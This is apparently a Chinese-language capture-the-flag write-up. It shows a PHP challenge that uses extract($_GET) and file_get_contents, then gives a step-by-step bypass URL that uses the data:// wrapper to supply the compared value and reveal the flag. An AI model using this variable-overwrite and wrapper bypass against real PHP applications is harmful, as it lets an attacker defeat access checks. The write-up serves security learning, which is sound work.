<?php
extract($_GET);
if (!empty($ac)){$f = trim(file_get_contents($fn));if ($ac === $f){echo "<p>This is flag:" ." $flag</p>";}else{echo "<p>sorry!</p>";}
}
?>这里涉及到几个不常用的函数
这里直接构建绕过语句
114.67.175.224:18451/?ac=1&fn=data://text/plain,1这里传递参数ac,并将其赋值为1
然后传递参数为fn,并利用伪协议创造text类型文件plain,并填充其值为1
之后通过file_get_contents函数,读取构建出的虚拟文件plain,得到f变量的值为1,从而通过判断
这里的plain为文件名可以随意取,text为类型同样可以随意
